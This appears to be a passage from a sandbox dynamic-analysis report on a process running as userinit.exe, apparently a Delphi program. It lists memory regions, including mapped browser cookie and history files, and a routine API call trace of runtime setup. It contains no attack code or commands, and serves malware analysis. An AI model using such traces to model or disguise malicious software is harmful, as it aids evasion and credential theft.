filename = ""
Region:
id = 3687
start_va = 0x2830000
end_va = 0x2936fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 3688
start_va = 0x2720000
end_va = 0x2828fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3691
start_va = 0x2830000
end_va = 0x293afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 3692
start_va = 0x2720000
end_va = 0x282cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 3695
start_va = 0x2830000
end_va = 0x293ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 3699
start_va = 0x2940000
end_va = 0x2a52fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002940000"
filename = ""
Region:
id = 3700
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 3701
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 3702
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 3703
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 3704
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 3705
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 3706
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 3707
start_va = 0x110000
end_va = 0x110fff
entry_point = 0x110000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 3708
start_va = 0x2a60000
end_va = 0x2b5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a60000"
filename = ""
Region:
id = 3709
start_va = 0x120000
end_va = 0x120fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000120000"
filename = ""
Region:
id = 3710
start_va = 0x6ce90000
end_va = 0x6cea8fff
entry_point = 0x6ce90000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 3711
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 3712
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 3713
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 3714
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 3718
start_va = 0x2ba0000
end_va = 0x2bdffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002ba0000"
filename = ""
Region:
id = 3719
start_va = 0x2c60000
end_va = 0x2d5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002c60000"
filename = ""
Region:
id = 3720
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 3721
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 3722
start_va = 0x2d60000
end_va = 0x302efff
entry_point = 0x2d60000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 3725
start_va = 0x130000
end_va = 0x131fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000130000"
filename = ""
Region:
id = 3726
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 3727
start_va = 0x140000
end_va = 0x140fff
entry_point = 0x140000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 3728
start_va = 0x150000
end_va = 0x151fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000150000"
filename = ""
Region:
id = 3729
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 3730
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 3731
start_va = 0x140000
end_va = 0x140fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000140000"
filename = ""
Region:
id = 3732
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 3733
start_va = 0x390000
end_va = 0x3bbfff
entry_point = 0x390000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 3734
start_va = 0x160000
end_va = 0x167fff
entry_point = 0x160000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 3735
start_va = 0x280000
end_va = 0x28ffff
entry_point = 0x280000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 3736
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 3737
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 3738
start_va = 0x3030000
end_va = 0x316ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003030000"
filename = ""
Region:
id = 3739
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 3740
start_va = 0x3030000
end_va = 0x312ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003030000"
filename = ""
Region:
id = 3741
start_va = 0x3130000
end_va = 0x316ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003130000"
filename = ""
Region:
id = 3742
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 3743
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 3744
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 3745
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 3746
start_va = 0x14e0000
end_va = 0x159ffff
entry_point = 0x14e0000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Thread:
id = 241
os_tid = 0xfcc
[0117.133] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0117.134] GetKeyboardType (nTypeFlag=0) returned 4
[0117.134] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0117.134] GetStartupInfoA (in: lpStartupInfo=0x1af8cc | out: lpStartupInfo=0x1af8cc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0117.134] GetVersion () returned 0x1db10106
[0117.134] GetVersion () returned 0x1db10106
[0117.134] GetCurrentThreadId () returned 0xfcc
[0117.134] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x1af3c8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0117.134] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1af2a3, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0117.134] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x1af3b8 | out: phkResult=0x1af3b8*=0x0) returned 0x2
[0117.134] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x1af3b8 | out: phkResult=0x1af3b8*=0x0) returned 0x2
[0117.134] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x1af3b8 | out: phkResult=0x1af3b8*=0x0) returned 0x2
[0117.134] lstrcpynA (in: lpString1=0x1af2a3, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0117.134] GetThreadLocale () returned 0x409
[0117.134] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x1af3b3, cchData=5 | out: lpLCData="ENU") returned 4
[0117.135] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0117.135] lstrcpynA (in: lpString1=0x1af2c0, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0117.135] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0117.135] lstrcpynA (in: lpString1=0x1af2c0, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0117.135] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0117.135] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0117.136] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x2a3640
[0117.136] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1280000
[0117.136] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x2a4640
[0117.136] VirtualAlloc (lpAddress=0x1280000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1280000
[0117.136] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0117.136] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0117.136] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0117.136] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0117.136] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0117.136] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0117.136] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0117.136] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0117.136] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0117.137] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0117.137] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0117.137] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0117.137] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0117.137] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0117.137] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0117.137] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0117.137] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0117.137] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0117.137] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0117.137] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0117.137] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0117.137] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0117.137] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0117.137] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0117.137] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0117.137] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0117.137] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0117.137] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x1af4ec, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0117.137] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x1af4d8, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0117.137] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x1af4d8, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0117.137] GetVersionExA (in: lpVersionInformation=0x1af870*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1af870*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0117.137] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0117.137] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0117.137] GetThreadLocale () returned 0x409
[0117.137] GetThreadLocale () returned 0x409
[0117.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x1af748, cchData=256 | out: lpLCData="Jan") returned 4
[0117.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x1af748, cchData=256 | out: lpLCData="January") returned 8
[0117.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x1af748, cchData=256 | out: lpLCData="Feb") returned 4
[0117.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x1af748, cchData=256 | out: lpLCData="February") returned 9
[0117.137] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x1af748, cchData=256 | out: lpLCData="Mar") returned 4
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x1af748, cchData=256 | out: lpLCData="March") returned 6
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x1af748, cchData=256 | out: lpLCData="Apr") returned 4
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x1af748, cchData=256 | out: lpLCData="April") returned 6
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x1af748, cchData=256 | out: lpLCData="May") returned 4
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x1af748, cchData=256 | out: lpLCData="May") returned 4
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x1af748, cchData=256 | out: lpLCData="Jun") returned 4
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x1af748, cchData=256 | out: lpLCData="June") returned 5
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x1af748, cchData=256 | out: lpLCData="Jul") returned 4
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x1af748, cchData=256 | out: lpLCData="July") returned 5
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x1af748, cchData=256 | out: lpLCData="Aug") returned 4
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x1af748, cchData=256 | out: lpLCData="August") returned 7
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x1af748, cchData=256 | out: lpLCData="Sep") returned 4
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x1af748, cchData=256 | out: lpLCData="September") returned 10
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x1af748, cchData=256 | out: lpLCData="Oct") returned 4
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x1af748, cchData=256 | out: lpLCData="October") returned 8
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x1af748, cchData=256 | out: lpLCData="Nov") returned 4
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x1af748, cchData=256 | out: lpLCData="November") returned 9
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x1af748, cchData=256 | out: lpLCData="Dec") returned 4
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x1af748, cchData=256 | out: lpLCData="December") returned 9
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x1af748, cchData=256 | out: lpLCData="Sun") returned 4
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x1af748, cchData=256 | out: lpLCData="Sunday") returned 7
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x1af748, cchData=256 | out: lpLCData="Mon") returned 4
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x1af748, cchData=256 | out: lpLCData="Monday") returned 7
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x1af748, cchData=256 | out: lpLCData="Tue") returned 4
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x1af748, cchData=256 | out: lpLCData="Tuesday") returned 8
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x1af748, cchData=256 | out: lpLCData="Wed") returned 4
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x1af748, cchData=256 | out: lpLCData="Wednesday") returned 10
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x1af748, cchData=256 | out: lpLCData="Thu") returned 4
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x1af748, cchData=256 | out: lpLCData="Thursday") returned 9
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x1af748, cchData=256 | out: lpLCData="Fri") returned 4
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x1af748, cchData=256 | out: lpLCData="Friday") returned 7
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x1af748, cchData=256 | out: lpLCData="Sat") returned 4
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x1af748, cchData=256 | out: lpLCData="Saturday") returned 9
[0117.138] GetThreadLocale () returned 0x409
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x1af7a4, cchData=256 | out: lpLCData="$") returned 2
[0117.138] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x1af7a4, cchData=256 | out: lpLCData="0") returned 2
[0117.139] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x1af7a4, cchData=256 | out: lpLCData="0") returned 2
[0117.139] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x1af89c, cchData=2 | out: lpLCData=",") returned 2
[0117.139] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x1af89c, cchData=2 | out: lpLCData=".") returned 2
[0117.139] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x1af7a4, cchData=256 | out: lpLCData="2") returned 2
[0117.139] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x1af89c, cchData=2 | out: lpLCData="/") returned 2
[0117.139] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x1af7a4, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0117.139] GetThreadLocale () returned 0x409
[0117.139] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x1af770, cchData=256 | out: lpLCData="1") returned 2
[0117.139] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x1af7a4, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0117.139] GetThreadLocale () returned 0x409
[0117.139] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x1af770, cchData=256 | out: lpLCData="1") returned 2
[0117.139] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x1af89c, cchData=2 | out: lpLCData=":") returned 2
[0117.139] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x1af7a4, cchData=256 | out: lpLCData="AM") returned 3
[0117.139] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x1af7a4, cchData=256 | out: lpLCData="PM") returned 3
[0117.139] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x1af7a4, cchData=256 | out: lpLCData="0") returned 2
[0117.139] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x1af7a4, cchData=256 | out: lpLCData="0") returned 2
[0117.139] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x1af7a4, cchData=256 | out: lpLCData="0") returned 2
[0117.139] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x1af89c, cchData=2 | out: lpLCData=",") returned 2
[0117.139] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0117.139] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0117.139] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0117.139] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0117.139] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0117.139] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0117.140] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0117.140] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0117.140] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0117.140] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0117.140] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0117.140] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0117.140] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0117.140] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0117.140] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0117.140] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0117.140] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0117.140] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0117.140] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
